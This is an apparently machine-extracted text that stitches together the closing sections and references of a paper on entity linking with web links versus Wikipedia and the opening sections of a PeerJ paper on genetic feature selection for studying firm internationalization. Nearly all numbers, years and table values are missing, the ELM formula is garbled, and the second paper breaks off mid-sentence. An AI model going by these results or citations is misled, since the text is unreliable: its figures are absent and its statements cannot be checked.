can links replace a curated kb? table compares performance of the wikipedia and web link systems using the basic feature set alone and with coherence. wikipedia models generally perform better. however, the web link configurations perform at . , . , . , and % of the wikipedia linker – % on average. this suggests that a link data set can replace a curated kb, with only a small impact on accuracy. results also show that adding coherence improves performance in all cases.

do links complement article text? table compares a standard wikipedia-only model to a model that also includes features derived from web link data. adding web link data has a strong impact on conll, improving both configurations by approximately points. we observe less impact on tac. nevertheless, the large improvements on conll provide good evidence for complementarity and recommend using both feature sets when available.

the state of the art. finally, table compares our wikipedia and web link combinations to state-of-the-art numbers from the literature. first, we note that adding coherence to our base model results in a significant improvement on conll test data, but not on tac . for comparison with the literature, we report % confidence intervals. if a confidence bar overlaps a reported number, the difference cannot be assumed significant at p < . . results on tac are competitive with he et al.'s ( ) . . on the conll data, our best system achieves . p@ – a new state of the art. furthermore, the best base model is competitive with previous art that uses complex collective approaches to coherence.

table : comparison to the disambiguation literature — dev, conll, and tac columns for our base model and base+coh (each with a % confidence interval), alongside hoffart, houlsby, he, and alhelbawy (values not recoverable from this copy).

discussion

we set out to determine whether links from external resources can replace a clean, curated kb. wikipedia is an incredible resource that has advanced our understanding of and capabilities for identifying and resolving entity mentions. however, it covers only a small fraction of all entities. applications that require other entities must therefore extend wikipedia or use alternative kbs. we explore a setting where a custom kb is required, but it is possible to harvest external documents with links into the custom kb. overall, results are promising for using links in a knowledge-poor setting. the link-derived system performs nearly as well as the rich-kb system on both of our held-out data sets. web link combinations perform at % of wikipedia combinations on average.
however, creating a kb as rich as wikipedia represents an estimated million hours of human effort (shirky, ). we do not have a comparable estimate for the web link data. however, it is created as byproduct of publish- ing activities and the labour pool is external. con- sidering this and the additional noise in web data, it is remarkable that the web link models do so well with respect to the wikipedia models. we also present detailed experiments compar- ing popularity, context, and coherence components across settings. here, results are even more surpris- ing. as expected, web link popularity and coher- ence models trail wikipedia models. however, web link context models outperform wikipedia context models by to points. we add the web link components into the wiki- pedia system to achieve, to our knowledge, the best published result of . on the conll data set. fur- thermore, results suggest that coherence modelling does not require complex global graph algorithms. our simple approach improves performance over the basic model by one to three points. on the other hand, our basic system without coherence modelling approaches state-of-the-art performance on its own. this suggests that additional popularity and con- text features from web links can replace coherence where efficiency is a concern. we believe these results have a number of impli- cations for management of entity kbs. first, they motivate concerted efforts to link content to kbs since links lead to substantial accuracy improve- ments over a conventional model based on rich kb data alone. second, it informs allocation of editorial resources between interlinking data sets and curat- ing kbs. since models built from link data alone ap- proach state-of-the-art performance, curating links is a reasonable alternative to curating a kb. this is especially true if link curation is cheaper or if links can be created as a byproduct of other content au- thorship and management activities. finally, where kb data is currently proprietary, results here motivate openly publishing kb entities and encouraging their use as a disambiguation end- point for public content. in addition to providing pathways to paid content, incoming links provide a simple means to harvest rich metadata from external content and this can be used to build high-quality resolution systems. a key avenue for future work is to evaluate how well our approach generalises to other web kbs. for instance, incorporating links to sites like freebase or imdb which complement or extend wikipedia’s entity coverage. conclusion despite widespread use in entity linking, wikipedia is clearly not the only source of entity information available on the web. we demonstrate the potential for web links to both complement and completely replace wikipedia derived data in entity linking. this suggests that, given sufficient incoming links, any knowledge base may be used for entity linking. we argue that this motivates open publishing of en- terprise kbs. code is available under an mit license at https://github.com/wikilinks/nel. https://github.com/wikilinks/nel acknowledgments andrew chisholm is supported by a google fac- ulty research award. ben hachey is the recipient of an australian research council discovery early career researcher award (de ). references ayman alhelbawy and robert gaizauskas. . graph ranking for collective named entity disambiguation. in annual meeting of the association for computational linguistics, pages – . marco baroni, georgiana dinu, and germán kruszewski. . 
don’t count, predict! a systematic compari- son of context-counting vs. context-predicting seman- tic vectors. in annual meeting of the association for computational linguistics, pages – . yin-wen chang, cho-jui hsieh, kai-wei chang, michael ringgaard, and chih-jen lin. . training and testing low-degree polynomial data mappings via linear svm. journal of machine learning research, : – . silviu cucerzan. . tac entity linking by perform- ing full-document entity extraction and disambigua- tion. in text analysis conference. jeffrey dalton and laura dietz. . umass ciir at tac kbp entity linking: query expansion using urban dictionary. in text analysis conference. paolo ferragina and ugo scaiella. . tagme: on-the-fly annotation of short text fragments (by wikipedia entities). in international conference on information and knowledge management, pages – . jiafeng guo, gu xu, xueqi cheng, and hang li. . named entity recognition in query. in international conference on research and development in informa- tion retrieval, pages – . ben hachey, will radford, joel nothman, matthew hon- nibal, and james r. curran. . evaluating en- tity linking with wikipedia. artificial intelligence, : – . ben hachey, joel nothman, and will radford. . cheap and easy entity evaluation. in annual meet- ing of the association for computational linguistics, pages – . xianpei han and le sun. . a generative entity- mention model for linking entities with knowledge base. in annual meeting of the association for com- putational linguistics, pages – . xianpei han, le sun, and jun zhao. . collective entity linking in web text: a graph-based method. in international conference on research and develop- ment in information retrieval, pages – . zhengyan he, shujie liu, mu li, ming zhou, longkai zhang, and houfeng wang. . learning entity representation for entity disambiguation. in annual meeting of the association for computational linguis- tics, pages – . johannes hoffart, mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in conference on empirical methods in natural lan- guage processing, pages – . johannes hoffart, yasemin altun, and gerhard weikum. . discovering emerging entities with ambiguous names. in international world wide web conference, pages – . heng ji and ralph grishman. . knowledge base population: successful approaches and challenges. in annual meeting of the association for computational linguistics, pages – . yuzhe jin, emre kcman, kuansan wang, and ricky loynd. . entity linking at the tail: sparse sig- nals, unknown entities, and phrase models. in inter- national conference on web search and data mining, pages – . thorsten joachims. . optimizing search engines us- ing clickthrough data. in international conference on knowledge discovery and data mining, pages – . yang li, chi wang, fangqiu han, jiawei han, dan roth, and xifeng yan. . mining evidences for named entity disambiguation. in international conference on knowledge discovery and data mining, pages – . edgar meij, wouter weerkamp, and maarten de rijke. . adding semantics to microblog posts. in inter- national conference on web search and data mining, pages – . pablo n. mendes, max jakob, and christian bizer. . dbpedia: a multilingual cross-domain knowledge base. in international conference on language re- sources and evaluation, pages – . tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. . 
distributed representations of words and phrases and their compositionality. in advances in neural information processing systems, pages – . david milne and ian h. witten. . learning to link with wikipedia. in conference on information and knowledge management, pages – . ndapandula nakashole, tomasz tylenda, and gerhard weikum. . fine-grained semantic typing of emerging entities. in annual meeting of the associa- tion for computational linguistics, pages – . máté pataki, miklós vajna, and attila marosi. . wikipedia as text. ercim news, ( ): – . fernando pereira, naftali tishby, and lillian lee. . distributional clustering of english words. in annual meeting of the association for computational linguis- tics, pages – . francesco piccinno and paolo ferragina. . from tagme to wat: a new entity annotator. in sigir workshop on entity recognition and disambiguation, pages – . will radford, will cannings, andrew naoum, joel noth- man, glen pink, daniel tse, and james r. curran. . (almost) total recall – sydney cmcrc at tac . in text analysis conference. will radford. . named entity linking using rich knowledge. ph.d. thesis, the university of sydney. lev ratinov, dan roth, doug downey, and mike ander- son. . local and global algorithms for disam- biguation to wikipedia. in annual meeting of the as- sociation for computational linguistics, pages – . gerard salton and christopher buckley. . term- weighting approaches in automatic text retrieval. in- formation processing and management, ( ): – . wei shan, jiawei han, and jianyong wang. . a probabilistic model for linking named entities in web text with heterogeneous information networks. in in- ternational conference on mangement of data, pages – . wei shen, jianyon wang, and jiawei han. . entity linking with a knowledge base: issues, techniques, and solutions (to appear). transactions on knowledge and data engineering. clay shirky. . cognitive surplus: creativity and generosity in a connected age. allen lane, london. sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . wikilinks: a large- scale cross-document coreference corpus labeled via links to wikipedia. technical report um-cs- - , university of massachusetts. merine thomas, hiroko bretz, thomas vacek, ben hachey, sudhanshu singh, and frank schilder. . newton: building an authority-driven company tag- ging and resolution system (in press). in emma tonkin and stephanie taylor, editors, working with text: tools, techniques and approaches for text min- ing. chandos, oxford, uk. erik f. tjong kim sang and fien de meulder. . in- troduction to the conll- shared task: language- independent named entity recognition. in conference on computational natural language learning, pages – . vasudeva varma, praveen bysani, kranthi reddy, vijay bharat, santosh gsk, karuna kumar, sudheer kove- lamudi, kiran kumar n, and nitin maganti. . iiit hyderabad at tac . in text analysis con- ference. peerj-cs- .. advanced feature selection to study the internationalization strategy of enterprises Álvaro herrero , alfredo jiménez and roberto alcalde departamento de ingeniería informática, universidad de burgos, burgos, spain department of management, kedge business school, bordeaux, france departamento de economia y administración de empresas, universidad de burgos, burgos, spain abstract firms face an increasingly complex economic and financial environment in which the access to international networks and markets is crucial. 
to be successful, companies need to understand the role of internationalization determinants such as bilateral psychic distance, experience, etc. cutting-edge feature selection methods are applied in the present paper and compared to previous results to gain deep knowledge about strategies for foreign direct investment. more precisely, evolutionary feature selection, addressed from the wrapper approach, is applied with two different classifiers as the fitness function: bagged trees and extreme learning machines. the proposed intelligent system is validated when applied to real-life data from spanish multinational enterprises (mnes). these data were extracted from databases belonging to the spanish ministry of industry, tourism, and trade. as a result, interesting conclusions are derived about the key features driving the internationalization of the companies under study. this is the first time that such outcomes are obtained by an intelligent system on internationalization data.

subjects data mining and machine learning, data science

keywords evolutionary feature selection, bagged decision trees, extreme learning machines, internationalization, multinational enterprises

how to cite this article herrero Á, jiménez a, alcalde r. . advanced feature selection to study the internationalization strategy of enterprises. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted january published march corresponding author Álvaro herrero, ahcosio@ubu.es academic editor arkaitz zubiaga additional information and declarations can be found on page doi . /peerj-cs. copyright herrero et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ahcosio@ubu.es https://peerj.com/academic-boards/editors/ http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/

introduction

many companies nowadays invest and conduct activities in multiple foreign markets. however, a successful internationalization strategy is far from easy in a global environment currently characterized by increasing complexity of networks and interconnections and growing competition (johanson & vahlne, ; vahlne, ; vahlne & bhatti, ). for these reasons, international strategy requires accurate and insightful information on the main determinants driving foreign investments to be able to implement the most appropriate decisions. specifically, one of the first and foremost relevant decisions is the selection of the target market. a carefully crafted international investment operation can go completely wrong if the location is not correct. accordingly, international business scholars have paid great attention to the study of the determinants of internationalization, notably of foreign direct investment (fdi) operations. among the myriad of factors playing a relevant role in the firm's choice of an overseas market, previous studies have highlighted that, in addition to firm features such as the industry to which the company belongs, the profitability or the size, and the specific characteristics of the country in terms of macroeconomic figures such as the gross domestic product (gdp), gdp per capita, etc., the concepts of bilateral psychic distance (dow & karunaratna, ; johanson & vahlne, ) and experience (clarke, tamaschke & liesch, ; jiménez et al., ) have a notable influence.
due to managerial bounded rationality (barnard & simon, ), exploring the various possible configurations of variables that may play a critical impact on internationalization is a complicated task that cannot be performed efficiently. managers in charge of their firm’s internationalization, but also policy-makers aiming to attract higher inflows of foreign investments, need to build on sophisticated tools that can extract more insightful information. to face this challenging issue, the application of artificial intelligence (ai) techniques has been previously proposed (herrero & jiménez, ). a wide variety of ai techniques has been previously applied, ranging from artificial neural networks (hsu & huang, ; contreras, manzanedo & herrero, ) to particle swarm optimization (simić et al., ). in the present paper, a combination of machine learning methods is proposed. differentiating from previous work where unsupervised learning is proposed (herrero, jiménez & bayraktar, ), in the present paper feature selection (fs) (john, kohavi & pfleger, ) is proposed in order to identify the subset of features that best characterize internationalization strategies of companies. to do so, advanced classifiers based on bagged decision trees (bdts) and extreme learning machines (elms), are applied. these supervised-learning methods are used to model the fitness function of a fs schema, where an evolutionary algorithm is applied in order to generate different combinations of features in order to predict the internationalization decision of companies with high accuracy. furthermore, obtained results are also compared with those from other machine learning methods that have been previously applied (jiménez & herrero, ) to the same dataset. similar, yet different, solutions comprising genetic fs have also been proposed for problems in other fields such as health (salcedo-sanz et al., ; maleki, zeinali & niaki, ), bio-informatics (chiesa et al., ) or credit rating (jadhav, he & jenkins, ) among others. artificial intelligence methods have been previously applied to fs (saad, ); although they are one of the newest proposals in the field of neural networks, elms have been previously applied as classifiers under the frame of evolutionary fs, since the seminal work was published (meng-yao et al., ). fs based on both basic elm and optimally pruned elm was applied in termenon et al. ( ) and chyzhyk, savio & graña ( ), where the data features were extracted from brain magnetic resonance imaging. in termenon et al. ( ) the elm-based fs was applied under the frame of an image biomarker identification system for cocaine dependance, while in chyzhyk, savio & graña ( ) it was applied to better diagnose patients suffering from alzheimer’s disease. results were compared to those obtained by support vector machines, k-nearest neighbour, learning vector quantization, relevant vector machines, and dendritic computing. in xue, yao & wu ( ) a variant of elms called error-minimized elm (em-elm) is applied to measure the quality of each one of the subsets of features generated by a genetic herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm. the proposed fs method is compared to some other machine learning methods that do only include one (c . ) basic decision tree. furthermore, results are obtained from benchmark datasets, none of them from the economics domain. in wang et al. 
( ), elms have been proposed for fs once again, but combined with particle swarm optimization, for regression. although the bootstrap aggregation (bagging) of decision trees has been also applied to fs (panthong & srivihok, ), to the best of the authors knowledge, it has never been compared to elm for this purpose. thus, going one step forward to the previous work, two advanced fs methods are applied in the present paper to a real-life dataset on company internationalization and their results are compared to those previously obtained by some other fs methods. the internationalization of companies has been previously researched by machine learning methods; in rustam, yaurita & segovia-vergas ( ) a dataset of spanish firms is analyzed by support vector machines (svms) in order to predict the success of internationalization procedures. that is, svms are applied in order to differentiate between successful and failed internationalization of manufacturing companies. differentiating from this previous work, the present paper proposes advanced fs to gain deep knowledge about the key features that are considered by companies in order to invest in a foreign country. the addressed topic of internationalization is explained in “literature review”, while the machine learning methods proposed and applied are described in “materials and methods”. obtained results are compiled and discussed in “results and discussion” and the conclusions derived from them are presented in “conclusions”. literature review the internationalization of firms is a complex managerial problem in which multiple factors need to be accounted for. as previously mentioned, both company-level and country-level characteristics can have a significant influence. companies will find a very different environment depending which country invest and, conversely, a given host country will present different opportunities and threats to companies depending on the firms‘ specific resources and capabilities. accordingly, both levels, company and country, need not to be overlooked. among the various determinants of the location choice of multinational enterprises, two constructs have been recently highlighted by scholars given their significance. thus, recent studies have shown that experience (padmanabhan & cho, ), at the company-level, and bilateral psychic distance (clavel san emeterio et al., ; håkanson et al., ; nordman & tolstoy, ; yildiz & fey, ), at the country one, are particularly important for the majority of multinational enterprises (mnes). furthermore, international business scholars have called for further attention to the multi-dimensional nature of these constructs, warning against the classic and somewhat simplistic perspective taken in many studies in which a single dimension is analyzed and supposed to capture the full effect (dow & karunaratna, ; jiménez et al., ; berry, guillén & zhou, ; pankaj, ; puthusserry, child & rodrigues, ). herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thus, in the early studies on international trade and investment, distance between countries (home and host) was uniquely conceptualized in terms of geography, building on the so-called “gravity model” (tinbergen & hekscher, ; kleinert & toubal, ). shortly after, scholars added the effect of cultural distance (hofstede, hofstede & minkov, ; kogut & singh, ; barkema, bell & pennings, ). 
despite the improvement and success of studies incorporating the effect of cultural distance, recent advances in the field have shown that the true determinant of the location choice is the concept of psychic distance (tung & verbeke, ), which is a broader construct encompassing cultural distance (dow & karunaratna, ). the concept of psychic distance was popularized by the uppsala school (johanson & vahlne, , ; johanson & wiedersheim-paul, ; vahlne & johanson, ; nordstrom & vahlne, ; vahlne & nordström, ) and it is typically defined as “the sum of factors preventing the flow of information from and to the market. examples are differences in language, education, business practices, culture, and industrial development” (johanson & vahlne, ). nordstrom & vahlne ( ) further develop the concept by emphasizing learning and understanding the foreign market instead of simply accessing the information. originally, thus, the emphasis of this literature stream was on the link between great psychic distance and the liability of foreignness, but recent extensions of the model have started to emphasize also how psychic distance also affects the establishment of relationships, and the evolution of other aspects such as r&d, and organizational and strategic change processes (johanson & vahlne, ; vahlne & johanson, ; brewer, ). psychic distance has been shown to be significant for various firm-related outcomes such as fdi location (ojala & tyrväinen, ; blomkvist & drogendijk, ; magnani, zucchella & floriani, ), subsidiary performance (dikova, ), entry mode (dow & larimo, ; dow & ferencikova, ), ownership in acquisitions (chikhouni, edwards & farashahi, ), innovation (azar & drogendijk, ) or export and trade (klein & roth, ). we present in table a review of these empirical studies on psychic distance. as it can be observed from table , all of the works employ traditional, deductive statistical estimation techniques. as choudhury, allen & endres ( ) highlight, machine learning techniques, drawing on abductive and inductive research, offer a complementary perspective that permits the observation and identification of data patterns that other techniques, such as the classic deductive regressions, can overlook due to their constraints to fit the data into pre-determined models. we precisely aim to adopt such perspective to assess the relevance of diverse firm-level and country-level factors in order to contribute to the study of firm internationalization. psychic distance comprises both the individual perceptions of distance of a given individual, shaped by the macro-level factors that form those perceptions (dow & karunaratna, ; brewer, ; dow & ferencikova, ; ambos, leicht-deobald & leinemann, ; bhowmick, ). we follow one of the most influential frameworks of psychic distance proposed in the literature, the one by dow & karunaratna ( ) published in the leading international business journal (journal of international business studies), in which six different dimensions (called stimuli) are proposed. specifically, these herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table synthesis of the literature on psychic distance. 
author year sample and estimation technique scope of the article klein & roth firms in canada (multinomial logit model) the authors analyze the impact of experience and psychic distance as predictors of export decision, differentiating between conditions of high vs low asset specificity dow & karunaratna country pairs trade flows among a set of nations (multiple regression model) the authors develop and test psychic distance stimuli including differences in culture, language, religion, education, and political systems. they find that these measures are better predictor than a composite measure of hofstede’s cultural dimensions chikhouni, edwards, & farashahi , full and partial acquisitions from countries (tobit regression) the authors find that the direction of distance moderates the relationship between distance and ownership in cross-border acquisitions. besides, they also find significant differences when the acquisition is made by an emerging country multinational compared to when it is made by a developed country one dikova foreign direct investments made in central and eastern europe (ordinary least-squares regression) the author obtains empirical evidence supporting a positive relationship between psychic distance and subsidiary performance in the absence of market specific knowledge. however, psychic distance has no effect on subsidiary performance when the firm has prior experience in the region or when it has established the subsidiary with a local partner dow & larimo , investments made by firms in host countries (binary logistic regression) the authors argue that a more sophisticated conceptualization and operationalization of the concepts of distance and international experience increases the ability to predict entry mode, the lack of which is the reason for ambiguous results in previous research ojala & tyrvainen finnish small and medium firms (stepwise multivariable linear regression) the authors examine the relevance of cultural/psychic distance, geographical distance, and several aspects related to market size as predictors of the target country preference of smes in the software industry prime, obadia, & vida. french manufacturing firms (qualitative study) the authors critically review the concept of psychic distance and contend that the inconsistent results in previous literature are due to weaknesses in its conceptualization, operationalization, and measurement. building on their grounded theory-based qualitative study with export managers in french manufacturing companies, the authors propose that psychic distance stimuli should cultural issues (i.e., patterns of thought, behaviors, and language prevailing in the foreign markets) and issues pertaining to the business environment and practices (i.e., relationships with businessmen; the differences in business practices; and the local economic, political, and legal environment) dow & ferencikova fdi ventures in slovakia from potential home countries (logistic regression and multiplevariable linear regression). in this paper the authors employ psychic distance stimuli to analyze fdi market selection, entry mode choice and performance. 
the find strong empirical support for a significant effect of psychic distance on both market selection and fdi performance, but the results for entry mode choice are ambiguous blomkvist & drogendijk chinese outward fdi (ordinary least squares regression) the authors analyze how psychic distance stimuli in language, religion, culture, economic development, political systems, education, plus geographic distance affect chinese ofdi and find that aggregated psychic distance and certain individual stimuli are significant predictors azar & drogendijk export ventures into international markets by swedish companies (structural equation models) the authors show that psychic distance has a positive effect on innovation. firms that perceived a high level of differences in psychically distant markets are more likely to introduce technological and organizational innovations in order to reduce uncertainty. furthermore, they also find that innovation mediates the relationship between psychic distance and firm performance (continued) herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ authors posit that the individual perceptions of psychic distance are shaped by the country differences in education, industrial development, language, democracy, social system, and religion. finally, at the company level, we also rely on recent advances in the literature in which studies have shown that the role of experience is much more complex than initially thought (clarke, tamaschke & liesch, ). thus, scholars have shown the great influence of the knowledge that firms can obtain from the experience of other firms (jiang, holburn & beamish, ). drawing on organizational learning theory (cyert & march, ; huber, ; levitt & march, ), companies are able to observe the behavior of other companies and obtain valuable information for their own strategy formulation and implementation by learning from best practices and mistakes and establishing collaborations (argote, beckman & epple, ; lieberman & asaba, ; terlaak & gong, ). especially when other firms share a key characteristic with the focal company (for example the country of origin or the industry to which they belong (jiménez & de la fuente, )), their previous actions represent a valuable source of information about expected challenges and opportunities, good and bad practices and networking opportunities (terlaak & gong, ; meyer & nguyen, ). overall, a correct internationalization strategy is complicated and elusive given the multitude of factors playing a role and their multi-dimensional nature, which calls for further examination of their particular importance. a finer-grained analysis of the determinants of fdi location by multinational companies can provide insightful information to prospective managers who need to make critical decisions that can determine the success, performance, viability and even survival of their enterprises. table (continued) author year sample and estimation technique scope of the article puthusserry, child, & rodrigues british smes and their indian partner smes in international business (qualitative methodology) the authors investigate inter-partner perceptions of psychic distance between britain and india, examining different dimensions of psychic distance, their impact and modes of coping with them. 
they find that culturally embedded psychic distance dimensions tend to have less impact and to be easier to cope with than institutionally embedded dimensions and identify four coping mechanisms magnani, zucchella, & floriani multiple case study methodology (italy and brazil). the authors analyze the role of firm-specific strategic objectives as determinants of foreign market selection together with objective distance and psychic distance ambos, leicht- deobald, & leinemann managers located in countries (hierarchical linear modeling) the authors analyze the formation of psychic distance perception and find that that country-specific international experience, formal education, and the use of common language reduce psychic distance perceptions. in contrast, international experience and overall work experience do not have a significant effect. besides, they find that individual-level antecedents have lower explanatory level compared to country-level ones dinner, kushwaha, & steenkamp firms based in countries (event study methodology) the authors investigate the role pf psychic distance when multinational enterprises face foreign marketing crises. they find that the relationship between psychic distance and firm performance during marketing crises has a curvilinear shape and that marketing capabilities moderate this relationship herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ materials and methods the present work aims at obtaining the most relevant features from enterprise-country data that will provide enterprise managers with the information to take decisions on internationalization. in this paper we employ a sample of firms coming from two sources belonging to the spanish ministry of industry, tourism, and trade and the website of the foreign trade institute (icex) (icex spain import and investments, ). we compiled a sample of independent multinational firms operating in overseas markets by conducting fdi operations. since small and medium firms have distinct capabilities and face specific challenges in terms of access to funding to internationalize, we focus on large firms and follow the well-established criterion of having employes at least (jiménez, ). we also focus on investments before to prevent distortions in the results due to the impact of the subsequent financial crisis (jiménez et al., ). following previous studies on the internationalization of spanish multinationals, we collected the following variables for each foreign subsidiary of the companies in our sample: � characteristics from host country such as unemployment, total inward fdi, gdp, growth, and population. � bilateral geographic distance as measured in the cepii database (centre d’Études prospectives et d’informations internationales (cepii), ). � psychic distance stimuli between countries. we include all dimensions identified by dow & karunaratna ( ): education, industrial development, language, democracy, political ideology, and religion. the first one, education, measures the differences on education enrollment and literacy between the two countries building on data from the united nations. the second one, industrial development, is the principal component result of ten factors including differences in the consumption of energy, vehicle ownership, employment in agriculture, the number of telephones and televisions, etc. 
the third one, language, measures the genealogical distance between the dominant languages in the countries and the percentage of population in each country speaking the language of the other. the fourth one, democracy, is based on the similarities in terms of political institutions, civil liberties, and the polcon and polity iv indices. the fifth one, political ideology, measures the differences in the ideologies of the executive powers in each country. finally, the sixth one, religion, measures the differences in terms of the predominant religion between the countries and the percentage of followers of that religion in the other country. comprehensive data for all the variables across the majority of countries in the world can be found at dow ( ). similarly, a more detailed description of the procedure to calculate the various psychic distance dimensions can be found at that website and in the seminal paper by dow & karunaratna ( ).

- vicarious experience: following the previous literature on vicarious experience (jiménez & de la fuente, ; jiang, sui & cao, ) we employ the total count of other spanish mnes present in the host country as our measure of vicarious experience. we distinguish between same-sector vicarious experience (total count of other spanish
in the present work, the target is to select some of the features from the original dataset as conclusions can be generalized and obtained knowledge applied to other problems (i.e., set of companies). thus, feature selection is the most appropriate method in the present study. hence, some advanced fs proposals are applied in the present research with the aim of identifying the key characteristics that lead to positive or negative internationalization decisions. in general terms, fs consists of a learning algorithm and an induction algorithm. the learning algorithm chooses certain features (from the original set) upon which it can focus its attention (john, kohavi & pfleger, ). only those features identified as the most relevant ones are then selected, while the remaining ones are discarded. additionally, there is also an induction algorithm that is trained on different combinations of features (from the original dataset) and aimed at minimizing the classification error from the given features. building on choudhury, allen & endres ( ), supervised machine learning is applied in the present work as the induction algorithm. under the frame of fs, for every original feature, two different levels of relevance (weak and strong) can be defined (kohavi & john, ). a feature is assigned a strong-relevance level if the error rate obtained by the induction algorithm increases significantly and a weak-relevance level is assigned otherwise. in keeping with this idea, strong-relevance features are to be selected from the internationalization dataset in order to know which ones are the most important ones when taking internationalization decisions. there are three different ways of coordinating the learning and induction algorithms: embedded, filter and wrapper. the wrapper scheme (kohavi & john, ) has been applied in the present work, being the induction algorithm wrapped by the learning algorithm. that is, the induction algorithm can be considered as a “black box” that is applied to the different combinations of original features that are generated. this perfectly suits the addressed problem because the internationalization decision can be modeled as the target class, being a binary classification problem. as a consequence, well-known and high-performance binary classifiers can be used as induction algorithms. additionally, the selection of features done by the different induction algorithms can be compared and interesting conclusions from the management perspective can be derived. herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ according to that, different classifiers have been applied as induction algorithms in order to predict the class of the data. in the present paper, both bagged decision trees and extreme learning machines are applied. furthermore, results obtained by these two methods are compared to those previously generated (jiménez & herrero, ) by random forest (rf) and svm on the very same dataset. the classifiers are fed with datasets containing the same data instances as in the original dataset but comprising a reduced number of features. in order to generate different combinations of them, standard genetic algorithms (gas) (goldberg, ) have been applied in the present paper. the main reason for choosing such approach is that, when dealing with big datasets, it is a powerful mean of reducing the time for finding near- optimal subsets of features (siedlecki & sklansky, ). 
when modeling the problem under this perspective, the different solutions to be considered (selected features, in the present research) are codified as n-dimensional binary vectors, being n the total number of features in the original dataset. in a fs problem, a value of is assigned to a given feature if it is not present in the feature subset and table descriptive statistics about the analyzed dataset. feature max min mean std. dev. geographic distance (log) . . . . psychic distance—education . . . . psychic distance—industrial development . . . . psychic distance—language . − . − . . psychic distance—democracy . . . . psychic distance—social system . . . . psychic distance—religion . − . − . . unemployment . . . . fdi/gdp . − . . . gdp growth . − . . . population (log) . . . . vicarious experience . . . . vicarious experience same sector . . . . vicarious experience different sector . . . . manufacturing . . . . food . . . . construction . . . . regulated . . . . financial . . . . employees . . . . roe . − . . . stock market . . . . related diversification . . . . unrelated diversification . . . . number of countries . . . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ otherwise. once representation of solutions is defined, the ga (as defined in fig. below) is applied. in standard gas, two operators (mutation and crossover) are usually applied depending on a previously stated probability (experimentation has been carried out with different values as explained in “results and discussion”). additionally, when modeling a ga figure flowchart of a standard genetic algorithm for wrapper feature selection. full-size doi: . /peerj-cs. /fig- herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (kramer, ), the fitness function is also defined, as the criteria to measure the “goodness” of a given solution, that is its quality. in the case of fs, the fitness function is usually defined as the misclassification rate of the classifier when applied to the dataset compressing the features in the solution to be evaluated. as a result, the best solution is selected, being the one with the lowest value calculated with the fitness function. that is, the combination of features that led the given classifier to get the lowest error when being tested. as previously mentioned, some different classifiers have been applied, being the novel ones described below. decision trees (dts) (safavian & landgrebe, ) are one of the most popular machine-learning methods. they have been successfully applied, proving to be valuable tools for different tasks such as classification, generalization, and description of data (sreerama, ). being trees, they are composed of nodes and arches, as shown in fig . nodes in a dt can be of two different types; internal and leaf. the first ones are those aimed at differentiating responses (branches) for a given question. in order to address it, the tree takes into account the original training dataset; more precisely, the values of a certain feature. on the other hand, leaf nodes are associated to the final decision (class prediction) and hence they are assigned a class label. all internal nodes have at least two child nodes and when all of them have two child nodes, the tree is binary. 
both parent/child arches and leaf nodes are connected: the first ones are labeled according to the responses to the node question and the second ones according to the classes or the forecast value. in the present research, performance of dts is improved by a booststrap (efron & tibshirani, ) aggregation (bagging) strategy, resulting in a bagged dt (bdt). within this tree ensemble, every tree is grown on an independently drawn bootstrap subset of the data. those data that are not included in this training subset are considered to be “out of bag” (oob) for this tree. the oob error rate is calculated in order to validate the bdt for each individual (subset of features). for such calculation, training data are not used but those oob data instances instead. figure sample structure of a decision tree. full-size doi: . /peerj-cs. /fig- herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in order to speed up the training of feedforward neural networks (ffnn), extreme learning machines (elms) were proposed (huang, zhu & siew, ). these neural nets can be depicted as: the functioning of such network can be mathematically expressed as: xm i¼ bigi xj � � ¼ xm i¼ big wi � xj þ bi � � ¼ oj; j ¼ ; : : :; n; ( ) being xj the jth input data, m the number of hidden nodes ( in fig. ), wi the weight vector connecting the input and hidden nodes, bi the weight vector connecting the hidden and output nodes, bi the bias of the ith node, giðÞ the activation function of the ith hidden node, and oj the output of the net for the jth input data. the elm training algorithm is pretty simple and consists of the following steps: � assign arbitrary input weights (wi) and bias (bi). � calculate the hidden layer output by applying the activation function on the weighted product of input values. � calculate the output weights (bi). to reduce training time, elms are designed as single-hidden layer nets which analytically determine the output weights and randomly choose their hidden nodes. the main consequence of this is that learning speed can be thousands of times faster than traditional ffnn training algorithms like the well-known back-propagation. unlike the well-known training algorithms based on gradient-based (they try to minimize training error without considering the magnitude of weights), the elm training algorithm reaches the smallest training error and norm of weights, at the same time. as a side effect, the model also has a good generalization performance and is consequently considered an advisable learning model (for both classification and regression) mainly in those applications when many training processes have to be launched (as in the present case of evolutionary fs). figure sample topology of an elm. full-size doi: . /peerj-cs. /fig- herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is widely acknowledged that one of the main disadvantages of ffnn is that all the parameters need to be tuned. in the case of elms, both the hidden layer biases and input weights are randomly assigned, obtaining acceptable error rates. all the methods previously described in this section have 